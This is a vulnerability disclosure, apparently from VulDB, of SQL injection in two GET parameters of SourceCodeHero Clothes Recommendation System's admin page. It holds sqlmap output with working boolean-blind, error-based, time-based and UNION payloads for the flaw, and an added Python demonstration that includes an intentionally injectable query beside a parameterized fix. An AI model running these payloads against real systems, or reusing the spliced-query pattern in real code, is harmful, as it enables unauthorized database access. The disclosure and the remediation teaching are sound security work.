Title | SourceCodeHero Clothes Recommendation System - view parameter V1.0 SQL Injection
Description | I would like to report a SQL injection vulnerability I discovered in SourceCodeHero - Clothes Recommendation System during my testing.
Details:
Affected URL/Endpoint: /Online_Shopping/admin/home.php?view=1%20&%20view1=1
Vulnerable Parameters: 'view', 'view1'
Risk Level: High (allows malicious users to execute arbitrary SQL queries)
Steps to reproduce:
1) Log in as admin via /online_shopping/admin
2) Navigate to 'View All'
3) Select a category and subcategory
4) Use a proxy like Burp Suite to intercept the request.
5) Input the payload to invoke the SQL injection.
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: view (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: view=1 ' AND 8219=8219-- amBF& view1=1
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: view=1 ' AND GTID_SUBSET(CONCAT(0x71766b6271,(SELECT (ELT(6428=6428,1))),0x71706a7a71),6428)-- CRgU& view1=1
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: view=1 ' AND (SELECT 9251 FROM (SELECT(SLEEP(5)))rdxA)-- kmmr& view1=1
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: view=1 ' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766b6271,0x6c476679526269716b6748556857525a67567a7a5178737575795974584f7454694e62525859614b,0x71706a7a71),NULL,NULL-- -& view1=1
Parameter: view1 (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: view=1 & view1=1' AND 8519=8519-- GRrq
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: view=1 & view1=1' AND GTID_SUBSET(CONCAT(0x71766b6271,(SELECT (ELT(5545=5545,1))),0x71706a7a71),5545)-- MWyB
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: view=1 & view1=1' AND (SELECT 1310 FROM (SELECT(SLEEP(5)))lIMf)-- cZqd
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: view=1 & view1=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766b6271,0x4f6870744a4650484f446d4a45636d7162694b54765874704a767975656d6f4945415a5264674878,0x71706a7a71)-- -
---
[13:39:49] [INFO] the back-end DBMS is MySQL
[13:39:49] [INFO] fetching banner
web application technology: Apache 2.4.59, PHP 8.2.18
back-end DBMS: MySQL >= 5.6
banner: '8.3.0'
Please let me know if you need further information or a more detailed analysis.

User | Delvy (UID 74555)
Submission | 10/21/2024 07:40 AM (2 months ago)
Moderation | 10/24/2024 12:48 PM (3 days later)
Status | Accepted
VulDB Entry | 281683 [SourceCodeHero Clothes Recommendation System 1.0 /admin/home.php view/view1 sql injection]
Points | 17
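For the view/view1 injection in /admin/home.php described in the submission above, the following is an added example that is neither the project's code nor part of the reporter's text. It places the query construction the sqlmap output implies (GET values spliced straight into the SQL string) next to a hardened handler that validates both ids as integers and binds them as parameters. The products table, its schema, the handler names and the use of sqlite3 as an offline stand-in for the MySQL backend are all assumptions made for the example; the boolean-blind probe for view1 is quoted from the report, and its false twin (8519=8520) is constructed here to show why a probe of that form reveals the flaw.

```python
import sqlite3


# Constructed stand-in for the shop's product table. The real schema behind
# /admin/home.php is not in the report; sqlite3 replaces MySQL so this runs offline.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE products ("
        "id INTEGER PRIMARY KEY, name TEXT, category_id INTEGER, subcategory_id INTEGER)"
    )
    conn.executemany(
        "INSERT INTO products (name, category_id, subcategory_id) VALUES (?, ?, ?)",
        [("denim jacket", 1, 1), ("linen shirt", 1, 2), ("wool coat", 2, 1)],
    )
    return conn


def vulnerable_view(conn: sqlite3.Connection, view: str, view1: str) -> list:
    """Assumed shape of the flawed handler: the raw GET values are spliced into
    the SQL text, so a single quote in either value rewrites the WHERE clause."""
    sql = (
        "SELECT id, name FROM products "
        f"WHERE category_id = '{view}' AND subcategory_id = '{view1}'"
    )
    return conn.execute(sql).fetchall()


def hardened_view(conn: sqlite3.Connection, view: str, view1: str) -> list:
    """Fix in two layers: accept only integer ids (int() tolerates the trailing
    space seen in the reported URL), then bind them as parameters so the
    database never parses user input as SQL."""
    try:
        category_id, subcategory_id = int(view), int(view1)
    except ValueError:
        raise ValueError("view and view1 must be integer ids") from None
    sql = "SELECT id, name FROM products WHERE category_id = ? AND subcategory_id = ?"
    return conn.execute(sql, (category_id, subcategory_id)).fetchall()


# Boolean-blind probe for view1 exactly as quoted in the sqlmap output above,
# plus a constructed false twin (8519=8520) that shows the row-count oracle.
TRUE_PROBE = "1' AND 8519=8519-- GRrq"
FALSE_PROBE = "1' AND 8519=8520-- GRrq"


def compare_handlers() -> dict:
    """Run both handlers against the same data and report what each returns."""
    conn = make_db()
    result = {
        # Flawed handler: the true probe behaves like view1=1, the false probe
        # empties the result set. That difference is what sqlmap's
        # "boolean-based blind" finding measures.
        "vulnerable_true_probe": len(vulnerable_view(conn, "1", TRUE_PROBE)),
        "vulnerable_false_probe": len(vulnerable_view(conn, "1", FALSE_PROBE)),
        # Hardened handler: the legitimate request from the report still works
        # (note the trailing space in view, as in the reported URL).
        "hardened_legitimate": len(hardened_view(conn, "1 ", "1")),
    }
    # Either probe is refused before any SQL is built.
    try:
        hardened_view(conn, "1", TRUE_PROBE)
        result["hardened_rejects_probe"] = False
    except ValueError:
        result["hardened_rejects_probe"] = True
    return result


if __name__ == "__main__":
    for key, value in compare_handlers().items():
        print(f"{key}: {value}")
```

The integer check alone would already stop these particular payloads, but the parameter binding is the control that holds regardless of how the ids are later used or which column types are involved; in the real PHP handler the equivalent is a mysqli or PDO prepared statement with the two ids bound, never string interpolation into the query text.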